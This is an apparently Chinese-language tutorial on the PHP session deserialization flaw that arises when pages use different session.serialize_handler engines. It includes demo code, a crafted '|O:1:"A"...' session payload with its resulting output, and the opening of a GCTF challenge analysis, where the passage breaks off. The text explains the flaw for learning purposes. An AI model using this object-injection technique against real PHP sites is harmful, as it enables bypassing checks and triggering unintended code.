在php.ini中存在三項(xiàng)配置項(xiàng):
session.save_path="" --設(shè)置session的存儲(chǔ)路徑 session.save_handler="" --設(shè)定用戶自定義存儲(chǔ)函數(shù),如果想使用PHP內(nèi)置會(huì)話存儲(chǔ)機(jī)制之外的可以使用本函數(shù)(數(shù)據(jù)庫等方式) session.auto_start boolen --指定會(huì)話模塊是否在請(qǐng)求開始時(shí)啟動(dòng)一個(gè)會(huì)話,默認(rèn)為0不啟動(dòng) session.serialize_handler string --定義用來序列化/反序列化的處理器名字。默認(rèn)使用php
以上的選項(xiàng)就是與PHP中的Session存儲(chǔ)和序列話存儲(chǔ)有關(guān)的選項(xiàng)。
在使用xampp組件安裝中,上述的配置項(xiàng)的設(shè)置如下:
session.save_path="D:\xampp\tmp" 表明所有的session文件都是存儲(chǔ)在xampp/tmp下 session.save_handler=files 表明session是以文件的方式來進(jìn)行存儲(chǔ)的 session.auto_start=0 表明默認(rèn)不啟動(dòng)session session.serialize_handler=php 表明session的默認(rèn)序列話引擎使用的是php序列話引擎
在上述的配置中,session.serialize_handler是用來設(shè)置session的序列話引擎的,除了默認(rèn)的PHP引擎之外,還存在其他引擎,不同的引擎所對(duì)應(yīng)的session的存儲(chǔ)方式不相同。
php_binary:存儲(chǔ)方式是,鍵名的長度對(duì)應(yīng)的ASCII字符+鍵名+經(jīng)過serialize()函數(shù)序列化處理的值
php:存儲(chǔ)方式是,鍵名+豎線+經(jīng)過serialize()函數(shù)序列處理的值
php_serialize(php>5.5.4):存儲(chǔ)方式是,經(jīng)過serialize()函數(shù)序列化處理的值
在PHP中默認(rèn)使用的是PHP引擎,如果要修改為其他的引擎,只需要添加代碼ini_set('session.serialize_handler', '需要設(shè)置的引擎');。示例代碼如下:
session 的目錄在 /var/lib/php/sessions 中
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump($_SESSION);
在 php_serialize 引擎下,session文件中存儲(chǔ)的數(shù)據(jù)為:
a:1:{s:4:"name";s:6:"spoock";}
php 引擎下文件內(nèi)容為:
name|s:6:"spoock";
php_binary 引擎下文件內(nèi)容為:
names:6:"spoock";
由于name的長度是4,4在ASCII表中對(duì)應(yīng)的就是EOT。根據(jù)php_binary的存儲(chǔ)規(guī)則,最后就是names:6:"spoock";。(突然發(fā)現(xiàn)ASCII的值為4的字符無法在網(wǎng)頁上面顯示,這個(gè)大家自行去查ASCII表吧)
PHP Session中的序列化危害
PHP中的Session的實(shí)現(xiàn)是沒有的問題,危害主要是由于程序員的Session使用不當(dāng)而引起的。
如果在PHP在反序列化存儲(chǔ)的$_SESSION數(shù)據(jù)時(shí)使用的引擎和序列化使用的引擎不一樣,會(huì)導(dǎo)致數(shù)據(jù)無法正確第反序列化。通過精心構(gòu)造的數(shù)據(jù)包,就可以繞過程序的驗(yàn)證或者是執(zhí)行一些系統(tǒng)的方法。例如:
$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';
php文件如:
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';
訪問后得到session文件中的內(nèi)容如下:
root/var/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6 a:1:{s:4:"ryat";s:30:"|O:1:"A":1:{s:1:"a";s:2:"xx";}
但此時(shí)模擬在其他頁面使用不同的php引擎來讀取時(shí)的內(nèi)容如下:(默認(rèn)使用php引擎讀取session文件)
<?php #ini_set('session.serialize_handler', 'php_serialize'); session_start(); #$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}'; class A { public $a = 'aa'; function __wakeup() { echo $this->a; } } // var_dump($_SESSION);
訪問該頁面輸出xx
xxarray(1) { ["a:1:{s:4:"ryat";s:30:""]=> object(A)#1 (1) { ["a"]=> string(2) "xx" } }
這是因?yàn)楫?dāng)使用php引擎的時(shí)候,php引擎會(huì)以|作為作為key和value的分隔符,那么就會(huì)將 a:1:{s:4:"ryat";s:30:" 作為SESSION的key,將 O:1:"A":1:{s:1:"a";s:2:"xx";} 作為value,然后進(jìn)行反序列化,最后就會(huì)得到A這個(gè)類。
這種由于序列話化和反序列化所使用的不一樣的引擎就是造成PHP Session序列話漏洞的原因。漏洞在加載使用php引擎的頁面時(shí)session去讀session中的內(nèi)容并反序列化導(dǎo)致漏洞觸發(fā),不需要任何輸出
GCTF上的一道session反序列化漏洞分析:
index.php中內(nèi)容為:
<?php //error_reporting(E_ERROR & ~E_NOTICE); ini_set('session.serialize_handler', 'php_serialize'); header("content-type;text/html;charset=utf-8"); session_start(); if(isset($_GET['src'])){ $_SESSION['src'] = $_GET['src']; highlight_file(__FILE__); print_r($_SESSION['src']); } ?> <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>代碼審計(jì)2</title> </head> <body>